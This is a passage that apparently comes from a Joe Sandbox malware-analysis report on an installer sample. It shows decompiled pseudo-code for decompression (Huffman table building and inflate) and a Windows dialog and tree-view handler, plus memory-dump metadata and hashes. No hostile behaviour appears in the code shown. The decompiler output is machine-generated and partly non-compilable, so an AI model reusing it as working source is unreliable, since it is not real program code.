                            													__eax = __edi + __eax + 0x102;
                            													__edi = __edx + __ecx;
                            													__eflags = __edx + __ecx - __eax;
                            													if(__edx + __ecx > __eax) {
                            														goto L9;
                            													}
                            													L86:
                            													__eflags =  *(__ebp - 0x14) - 0x10;
                            													if( *(__ebp - 0x14) != 0x10) {
                            														L89:
                            														__edi = 0;
                            														__eflags = 0;
                            														L90:
                            														__eax = __esi + 0xc + __ecx * 4;
                            														do {
                            															L91:
                            															 *__eax = __edi;
                            															__ecx = __ecx + 1;
                            															__eax = __eax + 4;
                            															__edx = __edx - 1;
                            															__eflags = __edx;
                            														} while (__edx != 0);
                            														__esi[2] = __ecx;
                            														continue;
                            													}
                            													L87:
                            													__eflags = __ecx - 1;
                            													if(__ecx < 1) {
                            														goto L9;
                            													}
                            													L88:
                            													__edi =  *(__esi + 8 + __ecx * 4);
                            													goto L90;
                            												}
                            												L78:
                            												__ecx = __edx;
                            												__ebx = __ebx - __edx;
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                            												__ecx = __esi[2];
                            												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                            												__esi[2] = __esi[2] + 1;
                            											}
                            											L94:
                            											__eax = __esi[1];
                            											__esi[0x144] = __esi[0x144] & 0x00000000;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                            											__edi = __eax;
                            											__eax = __eax >> 5;
                            											__edi = __edi & 0x0000001f;
                            											__ecx = 0x101;
                            											__eax = __eax & 0x0000001f;
                            											__edi = __edi + 0x101;
                            											__eax = __eax + 1;
                            											__edx = __ebp - 0xc;
                            											 *(__ebp - 0x14) = __eax;
                            											 &(__esi[0x148]) = __ebp - 4;
                            											 *(__ebp - 4) = 9;
                            											__ebp - 0x18 =  &(__esi[3]);
                            											 *(__ebp - 0x10) = 6;
                            											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                            											__eflags =  *(__ebp - 4);
                            											if( *(__ebp - 4) == 0) {
                            												__eax = __eax | 0xffffffff;
                            												__eflags = __eax;
                            											}
                            											__eflags = __eax;
                            											if(__eax != 0) {
                            												goto L9;
                            											} else {
                            												L97:
                            												__ebp - 0xc =  &(__esi[0x148]);
                            												__ebp - 0x10 = __ebp - 0x1c;
                            												__eax = __esi + 0xc + __edi * 4;
                            												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                            												__eflags = __eax;
                            												if(__eax != 0) {
                            													goto L9;
                            												}
                            												L98:
                            												__eax =  *(__ebp - 0x10);
                            												__eflags =  *(__ebp - 0x10);
                            												if( *(__ebp - 0x10) != 0) {
                            													L100:
                            													__cl =  *(__ebp - 4);
                            													 *__esi =  *__esi & 0x00000000;
                            													__eflags =  *__esi;
                            													__esi[4] = __al;
                            													__eax =  *(__ebp - 0x18);
                            													__esi[5] =  *(__ebp - 0x18);
                            													__eax =  *(__ebp - 0x1c);
                            													__esi[4] = __cl;
                            													__esi[6] =  *(__ebp - 0x1c);
                            													goto L101;
                            												}
                            												L99:
                            												__eflags = __edi - 0x101;
                            												if(__edi > 0x101) {
                            													goto L9;
                            												}
                            												goto L100;
                            											}
                            										case 0xe:
                            											goto L9;
                            										case 0xf:
                            											L175:
                            											__eax =  *(__ebp - 0x30);
                            											__esi[0x26ea] =  *(__ebp - 0x30);
                            											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                            											__ecx = __esi[0x26ea];
                            											__edx = __esi[0x26e9];
                            											__eflags = __ecx - __edx;
                            											 *(__ebp - 0x30) = __ecx;
                            											if(__ecx >= __edx) {
                            												__eax = __esi[0x26e8];
                            												__eax = __esi[0x26e8] - __ecx;
                            												__eflags = __eax;
                            											} else {
                            												__edx = __edx - __ecx;
                            												__eax = __edx - __ecx - 1;
                            											}
                            											__eflags = __ecx - __edx;
                            											 *(__ebp - 0x2c) = __eax;
                            											if(__ecx != __edx) {
                            												L183:
                            												__edi = 0;
                            												goto L10;
                            											} else {
                            												L179:
                            												__eax = __esi[0x145];
                            												__eflags = __eax - 8;
                            												 *__esi = __eax;
                            												if(__eax != 8) {
                            													L184:
                            													0 = 1;
                            													goto L10;
                            												}
                            												goto L180;
                            											}
                            									}
                            								}
                            								L181:
                            								goto L9;
                            							}
                            							L70:
                            							if( *__edi == __eax) {
                            								goto L72;
                            							}
                            							L71:
                            							__esi[2] = __esi[2] & __eax;
                            							 *__esi = 0xd;
                            							goto L93;
                            						}
                            					}
                            				}
                            				L182:
                            				_t443 = 0;
                            				_t446[0x147] =  *(_t448 - 0x40);
                            				_t446[0x146] = _t425;
                            				( *(_t448 + 8))[1] = 0;
                            				goto L11;
                            			}
                            0x00406d7e
                            0x00000000
                            0x00406d72
                            0x00406cac
                            0x00406cac
                            0x00406cb2
                            0x00406cb5
                            0x00406cb7
                            0x00406ce2
                            0x00406ce5
                            0x00406ceb
                            0x00406cf0
                            0x00406cf6
                            0x00406cfc
                            0x00406cfe
                            0x00406d01
                            0x00406d0a
                            0x00406d10
                            0x00406d10
                            0x00406d03
                            0x00406d05
                            0x00406d07
                            0x00406d07
                            0x00406d12
                            0x00406d18
                            0x00406d1b
                            0x00406d1d
                            0x00406d1f
                            0x00406d25
                            0x00406d27
                            0x00406d29
                            0x00406d2c
                            0x00406d35
                            0x00406d35
                            0x00406d37
                            0x00406d2e
                            0x00406d2e
                            0x00406d31
                            0x00406d31
                            0x00406d39
                            0x00406d39
                            0x00406d27
                            0x00406d3c
                            0x00406d3e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d3e
                            0x00406cb9
                            0x00406cb9
                            0x00406cbf
                            0x00406cc5
                            0x00406cc7
                            0x00000000
                            0x00000000
                            0x00406cc9
                            0x00406cc9
                            0x00406ccb
                            0x00406ccd
                            0x00406cd0
                            0x00406cd7
                            0x00406cd7
                            0x00406cd9
                            0x00406cd2
                            0x00406cd2
                            0x00406cd4
                            0x00406cd4
                            0x00406cdb
                            0x00406cdd
                            0x00406ce0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406de4
                            0x00406de7
                            0x00406dea
                            0x00406df0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406fc7
                            0x00406fc7
                            0x00406fc7
                            0x00406fca
                            0x00406fcd
                            0x00406fcf
                            0x00406fd2
                            0x00406fd8
                            0x00406fdf
                            0x00406fe1
                            0x00000000
                            0x00000000
                            0x00406eb5
                            0x00406eb5
                            0x00406edd
                            0x00406edd
                            0x00406edd
                            0x00406edf
                            0x00000000
                            0x00000000
                            0x00406ebd
                            0x00406ebd
                            0x00406ec1
                            0x00000000
                            0x00000000
                            0x00406ec7
                            0x00406ec7
                            0x00406eca
                            0x00406ecd
                            0x00406ed0
                            0x00406ed2
                            0x00406ed4
                            0x00406ed7
                            0x00406eda
                            0x00406eda
                            0x00406eda
                            0x00406ee1
                            0x00406ee1
                            0x00406ee9
                            0x00406eec
                            0x00406ef2
                            0x00406ef5
                            0x00406ef9
                            0x00406efd
                            0x00406f00
                            0x00406f03
                            0x00406f1b
                            0x00406f1b
                            0x00406f1e
                            0x00406f2c
                            0x00406f2f
                            0x00406f20
                            0x00406f20
                            0x00406f22
                            0x00406f29
                            0x00406f29
                            0x00406f58
                            0x00406f58
                            0x00406f58
                            0x00406f5b
                            0x00406f5d
                            0x00000000
                            0x00000000
                            0x00406f38
                            0x00406f38
                            0x00406f3c
                            0x00000000
                            0x00000000
                            0x00406f42
                            0x00406f42
                            0x00406f45
                            0x00406f48
                            0x00406f4b
                            0x00406f4d
                            0x00406f4f
                            0x00406f52
                            0x00406f55
                            0x00406f55
                            0x00406f55
                            0x00406f5f
                            0x00406f5f
                            0x00406f61
                            0x00406f63
                            0x00406f6e
                            0x00406f71
                            0x00406f74
                            0x00406f76
                            0x00406f78
                            0x00406f7a
                            0x00406f7d
                            0x00406f80
                            0x00406f85
                            0x00406f88
                            0x00406f8b
                            0x00406f8e
                            0x00406f95
                            0x00406f98
                            0x00406f9a
                            0x00000000
                            0x00000000
                            0x00406fa0
                            0x00406fa0
                            0x00406fa4
                            0x00406fb5
                            0x00406fb5
                            0x00406fb5
                            0x00406fb7
                            0x00406fb7
                            0x00406fbb
                            0x00406fbb
                            0x00406fbb
                            0x00406fbd
                            0x00406fbe
                            0x00406fc1
                            0x00406fc1
                            0x00406fc1
                            0x00406fc4
                            0x00000000
                            0x00406fc4
                            0x00406fa6
                            0x00406fa6
                            0x00406fa9
                            0x00000000
                            0x00000000
                            0x00406faf
                            0x00406faf
                            0x00000000
                            0x00406faf
                            0x00406f05
                            0x00406f05
                            0x00406f07
                            0x00406f09
                            0x00406f0c
                            0x00406f0f
                            0x00406f13
                            0x00406f13
                            0x00406fe7
                            0x00406fe7
                            0x00406fea
                            0x00406ff1
                            0x00406ff5
                            0x00406ff7
                            0x00406ffa
                            0x00406ffd
                            0x00407002
                            0x00407005
                            0x00407007
                            0x00407008
                            0x0040700b
                            0x00407016
                            0x00407019
                            0x00407030
                            0x00407035
                            0x0040703c
                            0x00407041
                            0x00407045
                            0x00407047
                            0x00407047
                            0x00407047
                            0x0040704a
                            0x0040704c
                            0x00000000
                            0x00407052
                            0x00407052
                            0x00407056
                            0x00407061
                            0x00407074
                            0x00407079
                            0x0040707e
                            0x00407080
                            0x00000000
                            0x00000000
                            0x00407086
                            0x00407086
                            0x00407089
                            0x0040708b
                            0x00407099
                            0x00407099
                            0x0040709c
                            0x0040709c
                            0x0040709f
                            0x004070a2
                            0x004070a5
                            0x004070a8
                            0x004070ab
                            0x004070ae
                            0x00000000
                            0x004070ae
                            0x0040708d
                            0x0040708d
                            0x00407093
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407093
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407432
                            0x00407432
                            0x00407438
                            0x0040743e
                            0x00407443
                            0x00407449
                            0x0040744f
                            0x00407451
                            0x00407454
                            0x0040745d
                            0x00407463
                            0x00407463
                            0x00407456
                            0x00407458
                            0x0040745a
                            0x0040745a
                            0x00407465
                            0x00407467
                            0x0040746a
                            0x004074a5
                            0x004074a5
                            0x00000000
                            0x0040746c
                            0x0040746c
                            0x0040746c
                            0x00407472
                            0x00407475
                            0x00407477
                            0x004074ac
                            0x004074ae
                            0x00000000
                            0x004074ae
                            0x00000000
                            0x00407477
                            0x00000000
                            0x00406ab6
                            0x00407484
                            0x00000000
                            0x00407484
                            0x00406e98
                            0x00406e9a
                            0x00000000
                            0x00000000
                            0x00406e9c
                            0x00406e9c
                            0x00406e9f
                            0x00000000
                            0x00406e9f
                            0x00406de4
                            0x00406da5
                            0x00407489
                            0x0040748c
                            0x0040748e
                            0x00407497
                            0x0040749d
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                            • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                            • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                            • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                            				signed int _v8;
                            				unsigned int _v12;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				intOrPtr* _v32;
                            				signed int* _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				void _v116;
                            				signed int _v176;
                            				signed int _v180;
                            				signed int _v240;
                            				signed int _t166;
                            				signed int _t168;
                            				intOrPtr _t175;
                            				signed int _t181;
                            				void* _t182;
                            				intOrPtr _t183;
                            				signed int* _t184;
                            				signed int _t186;
                            				signed int _t187;
                            				signed int* _t189;
                            				signed int _t190;
                            				intOrPtr* _t191;
                            				intOrPtr _t192;
                            				signed int _t193;
                            				signed int _t195;
                            				signed int _t200;
                            				signed int _t205;
                            				void* _t207;
                            				short _t208;
                            				signed char _t222;
                            				signed int _t224;
                            				signed int _t225;
                            				signed int* _t232;
                            				signed int _t233;
                            				signed int _t234;
                            				void* _t235;
                            				signed int _t236;
                            				signed int _t244;
                            				signed int _t246;
                            				signed int _t251;
                            				signed int _t254;
                            				signed int _t256;
                            				signed int _t259;
                            				signed int _t262;
                            				void* _t263;
                            				void* _t264;
                            				signed int _t267;
                            				intOrPtr _t269;
                            				intOrPtr _t271;
                            				signed int _t274;
                            				intOrPtr* _t275;
                            				unsigned int _t276;
                            				void* _t277;
                            				signed int _t278;
                            				intOrPtr* _t279;
                            				signed int _t281;
                            				intOrPtr _t282;
                            				intOrPtr _t283;
                            				signed int* _t284;
                            				signed int _t286;
                            				signed int _t287;
                            				signed int _t288;
                            				signed int _t296;
                            				signed int* _t297;
                            				intOrPtr _t298;
                            				void* _t299;
                            
                            				_t278 = _a8;
                            				_t187 = 0x10;
                            				memset( &_v116, 0, _t187 << 2);
                            				_t189 = _a4;
                            				_t233 = _t278;
                            				do {
                            					_t166 =  *_t189;
                            					_t189 =  &(_t189[1]);
                            					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                            					_t233 = _t233 - 1;
                            				} while (_t233 != 0);
                            				if(_v116 != _t278) {
                            					_t279 = _a28;
                            					_t267 =  *_t279;
                            					_t190 = 1;
                            					_a28 = _t267;
                            					_t234 = 0xf;
                            					while(1) {
                            						_t168 = 0;
                            						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                            							break;
                            						}
                            						_t190 = _t190 + 1;
                            						if(_t190 <= _t234) {
                            							continue;
                            						}
                            						break;
                            					}
                            					_v8 = _t190;
                            					if(_t267 < _t190) {
                            						_a28 = _t190;
                            					}
                            					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                            						_t234 = _t234 - 1;
                            						if(_t234 != 0) {
                            							continue;
                            						}
                            						break;
                            					}
                            					_v28 = _t234;
                            					if(_a28 > _t234) {
                            						_a28 = _t234;
                            					}
                            					 *_t279 = _a28;
                            					_t181 = 1 << _t190;
                            					while(_t190 < _t234) {
                            						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                            						if(_t182 < 0) {
                            							L64:
                            							return _t168 | 0xffffffff;
                            						}
                            						_t190 = _t190 + 1;
                            						_t181 = _t182 + _t182;
                            					}
                            					_t281 = _t234 << 2;
                            					_t191 = _t299 + _t281 - 0x70;
                            					_t269 =  *_t191;
                            					_t183 = _t181 - _t269;
                            					_v52 = _t183;
                            					if(_t183 < 0) {
                            						goto L64;
                            					}
                            					_v176 = _t168;
                            					 *_t191 = _t269 + _t183;
                            					_t192 = 0;
                            					_t235 = _t234 - 1;
                            					if(_t235 == 0) {
                            						L21:
                            						_t184 = _a4;
                            						_t271 = 0;
                            						do {
                            							_t193 =  *_t184;
                            							_t184 =  &(_t184[1]);
                            							if(_t193 != _t168) {
                            								_t232 = _t299 + _t193 * 4 - 0xb0;
                            								_t236 =  *_t232;
                            								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                            								 *_t232 = _t236 + 1;
                            							}
                            							_t271 = _t271 + 1;
                            						} while (_t271 < _a8);
                            						_v16 = _v16 | 0xffffffff;
                            						_v40 = _v40 & 0x00000000;
                            						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                            						_t195 = _v8;
                            						_t186 =  ~_a28;
                            						_v12 = _t168;
                            						_v180 = _t168;
                            						_v36 = 0x432190;
                            						_v240 = _t168;
                            						if(_t195 > _v28) {
                            							L62:
                            							_t168 = 0;
                            							if(_v52 == 0 || _v28 == 1) {
                            								return _t168;
                            							} else {
                            								goto L64;
                            							}
                            						}
                            						_v44 = _t195 - 1;
                            						_v32 = _t299 + _t195 * 4 - 0x70;
                            						do {
                            							_t282 =  *_v32;
                            							if(_t282 == 0) {
                            								goto L61;
                            							}
                            							while(1) {
                            								_t283 = _t282 - 1;
                            								_t200 = _a28 + _t186;
                            								_v48 = _t283;
                            								_v24 = _t200;
                            								if(_v8 <= _t200) {
                            									goto L45;
                            								}
                            								L31:
                            								_v20 = _t283 + 1;
                            								do {
                            									_v16 = _v16 + 1;
                            									_t296 = _v28 - _v24;
                            									if(_t296 > _a28) {
                            										_t296 = _a28;
                            									}
                            									_t222 = _v8 - _v24;
                            									_t254 = 1 << _t222;
                            									if(1 <= _v20) {
                            										L40:
                            										_t256 =  *_a36;
                            										_t168 = 1 << _t222;
                            										_v40 = 1;
                            										_t274 = _t256 + 1;
                            										if(_t274 > 0x5a0) {
                            											goto L64;
                            										}
                            									} else {
                            										_t275 = _v32;
                            										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                            										if(_t222 >= _t296) {
                            											goto L40;
                            										}
                            										while(1) {
                            											_t222 = _t222 + 1;
                            											if(_t222 >= _t296) {
                            												goto L40;
                            											}
                            											_t275 = _t275 + 4;
                            											_t264 = _t263 + _t263;
                            											_t175 =  *_t275;
                            											if(_t264 <= _t175) {
                            												goto L40;
                            											}
                            											_t263 = _t264 - _t175;
                            										}
                            										goto L40;
                            									}
                            									_t168 = _a32 + _t256 * 4;
                            									_t297 = _t299 + _v16 * 4 - 0xec;
                            									 *_a36 = _t274;
                            									_t259 = _v16;
                            									 *_t297 = _t168;
                            									if(_t259 == 0) {
                            										 *_a24 = _t168;
                            									} else {
                            										_t276 = _v12;
                            										_t298 =  *((intOrPtr*)(_t297 - 4));
                            										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                            										_a5 = _a28;
                            										_a4 = _t222;
                            										_t262 = _t276 >> _t186;
                            										_a6 = (_t168 - _t298 >> 2) - _t262;
                            										 *(_t298 + _t262 * 4) = _a4;
                            									}
                            									_t224 = _v24;
                            									_t186 = _t224;
                            									_t225 = _t224 + _a28;
                            									_v24 = _t225;
                            								} while (_v8 > _t225);
                            								L45:
                            								_t284 = _v36;
                            								_a5 = _v8 - _t186;
                            								if(_t284 < 0x432190 + _a8 * 4) {
                            									_t205 =  *_t284;
                            									if(_t205 >= _a12) {
                            										_t207 = _t205 - _a12 + _t205 - _a12;
                            										_v36 =  &(_v36[1]);
                            										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                            										_t208 =  *((intOrPtr*)(_t207 + _a16));
                            									} else {
                            										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                            										_t208 =  *_t284;
                            										_v36 =  &(_t284[1]);
                            									}
                            									_a6 = _t208;
                            								} else {
                            									_a4 = 0xc0;
                            								}
                            								_t286 = 1 << _v8 - _t186;
                            								_t244 = _v12 >> _t186;
                            								while(_t244 < _v40) {
                            									 *(_t168 + _t244 * 4) = _a4;
                            									_t244 = _t244 + _t286;
                            								}
                            								_t287 = _v12;
                            								_t246 = 1 << _v44;
                            								while((_t287 & _t246) != 0) {
                            									_t287 = _t287 ^ _t246;
                            									_t246 = _t246 >> 1;
                            								}
                            								_t288 = _t287 ^ _t246;
                            								_v20 = 1;
                            								_v12 = _t288;
                            								_t251 = _v16;
                            								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                            									L60:
                            									if(_v48 != 0) {
                            										_t282 = _v48;
                            										_t283 = _t282 - 1;
                            										_t200 = _a28 + _t186;
                            										_v48 = _t283;
                            										_v24 = _t200;
                            										if(_v8 <= _t200) {
                            											goto L45;
                            										}
                            										goto L31;
                            									}
                            									break;
                            								} else {
                            									goto L58;
                            								}
                            								do {
                            									L58:
                            									_t186 = _t186 - _a28;
                            									_t251 = _t251 - 1;
                            								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                            								_v16 = _t251;
                            								goto L60;
                            							}
                            							L61:
                            							_v8 = _v8 + 1;
                            							_v32 = _v32 + 4;
                            							_v44 = _v44 + 1;
                            						} while (_v8 <= _v28);
                            						goto L62;
                            					}
                            					_t277 = 0;
                            					do {
                            						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                            						_t277 = _t277 + 4;
                            						_t235 = _t235 - 1;
                            						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                            					} while (_t235 != 0);
                            					goto L21;
                            				}
                            				 *_a24 =  *_a24 & 0x00000000;
                            				 *_a28 =  *_a28 & 0x00000000;
                            				return 0;
                            			}


                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                            • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                            • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                            				struct HWND__* _v8;
                            				struct HWND__* _v12;
                            				long _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				signed char* _v32;
                            				int _v36;
                            				signed int _v44;
                            				int _v48;
                            				signed int* _v60;
                            				signed char* _v64;
                            				signed int _v68;
                            				long _v72;
                            				void* _v76;
                            				intOrPtr _v80;
                            				intOrPtr _v84;
                            				void* _v88;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t198;
                            				intOrPtr _t201;
                            				long _t207;
                            				signed int _t211;
                            				signed int _t222;
                            				void* _t225;
                            				void* _t226;
                            				int _t232;
                            				long _t237;
                            				long _t238;
                            				signed int _t239;
                            				signed int _t245;
                            				signed int _t247;
                            				signed char _t248;
                            				signed char _t254;
                            				void* _t258;
                            				void* _t260;
                            				signed char* _t278;
                            				signed char _t279;
                            				long _t284;
                            				struct HWND__* _t291;
                            				signed int* _t292;
                            				int _t293;
                            				long _t294;
                            				signed int _t295;
                            				void* _t297;
                            				long _t298;
                            				int _t299;
                            				signed int _t300;
                            				signed int _t303;
                            				signed int _t311;
                            				signed char* _t319;
                            				int _t324;
                            				void* _t326;
                            
                            				_t291 = _a4;
                            				_v12 = GetDlgItem(_t291, 0x3f9);
                            				_v8 = GetDlgItem(_t291, 0x408);
                            				_t326 = SendMessageW;
                            				_v24 =  *0x434f28;
                            				_v28 =  *0x434f10 + 0x94;
                            				if(_a8 != 0x110) {
                            					L23:
                            					if(_a8 != 0x405) {
                            						_t301 = _a16;
                            					} else {
                            						_a12 = 0;
                            						_t301 = 1;
                            						_a8 = 0x40f;
                            						_a16 = 1;
                            					}
                            					if(_a8 == 0x4e || _a8 == 0x413) {
                            						_v16 = _t301;
                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                            							if(( *0x434f19 & 0x00000002) != 0) {
                            								L41:
                            								if(_v16 != 0) {
                            									_t237 = _v16;
                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                            									}
                            									_t238 = _v16;
                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                            										_t301 = _v24;
                            										_t239 =  *(_t238 + 0x5c);
                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                            										} else {
                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                            										}
                            									}
                            								}
                            								goto L48;
                            							}
                            							if(_a8 == 0x413) {
                            								L33:
                            								_t301 = 0 | _a8 != 0x00000413;
                            								_t245 = E00404E54(_v8, _a8 != 0x413);
                            								_t295 = _t245;
                            								if(_t295 >= 0) {
                            									_t94 = _v24 + 8; // 0x8
                            									_t301 = _t245 * 0x818 + _t94;
                            									_t247 =  *_t301;
                            									if((_t247 & 0x00000010) == 0) {
                            										if((_t247 & 0x00000040) == 0) {
                            											_t248 = _t247 ^ 0x00000001;
                            										} else {
                            											_t254 = _t247 ^ 0x00000080;
                            											if(_t254 >= 0) {
                            												_t248 = _t254 & 0x000000fe;
                            											} else {
                            												_t248 = _t254 | 0x00000001;
                            											}
                            										}
                            										 *_t301 = _t248;
                            										E0040117D(_t295);
                            										_a12 = _t295 + 1;
                            										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                            										_a8 = 0x40f;
                            									}
                            								}
                            								goto L41;
                            							}
                            							_t301 = _a16;
                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                            								goto L41;
                            							}
                            							goto L33;
                            						} else {
                            							goto L48;
                            						}
                            					} else {
                            						L48:
                            						if(_a8 != 0x111) {
                            							L56:
                            							if(_a8 == 0x200) {
                            								SendMessageW(_v8, 0x200, 0, 0);
                            							}
                            							if(_a8 == 0x40b) {
                            								_t225 =  *0x42d24c;
                            								if(_t225 != 0) {
                            									ImageList_Destroy(_t225);
                            								}
                            								_t226 =  *0x42d260;
                            								if(_t226 != 0) {
                            									GlobalFree(_t226);
                            								}
                            								 *0x42d24c = 0;
                            								 *0x42d260 = 0;
                            								 *0x434f60 = 0;
                            							}
                            							if(_a8 != 0x40f) {
                            								L90:
                            								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                            									ShowWindow(_v8, _t324);
                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                            								}
                            								goto L93;
                            							} else {
                            								E004011EF(_t301, 0, 0);
                            								_t198 = _a12;
                            								if(_t198 != 0) {
                            									if(_t198 != 0xffffffff) {
                            										_t198 = _t198 - 1;
                            									}
                            									_push(_t198);
                            									_push(8);
                            									E00404ED4();
                            								}
                            								if(_a16 == 0) {
                            									L75:
                            									E004011EF(_t301, 0, 0);
                            									_v36 =  *0x42d260;
                            									_t201 =  *0x434f28;
                            									_v64 = 0xf030;
                            									_v24 = 0;
                            									if( *0x434f2c <= 0) {
                            										L86:
                            										if( *0x434fbe == 0x400) {
                            											InvalidateRect(_v8, 0, 1);
                            										}
                            										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                            											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                            										}
                            										goto L90;
                            									}
                            									_t292 = _t201 + 8;
                            									do {
                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                            										if(_t207 != 0) {
                            											_t303 =  *_t292;
                            											_v72 = _t207;
                            											_v76 = 8;
                            											if((_t303 & 0x00000001) != 0) {
                            												_v76 = 9;
                            												_v60 =  &(_t292[4]);
                            												_t292[0] = _t292[0] & 0x000000fe;
                            											}
                            											if((_t303 & 0x00000040) == 0) {
                            												_t211 = (_t303 & 0x00000001) + 1;
                            												if((_t303 & 0x00000010) != 0) {
                            													_t211 = _t211 + 3;
                            												}
                            											} else {
                            												_t211 = 3;
                            											}
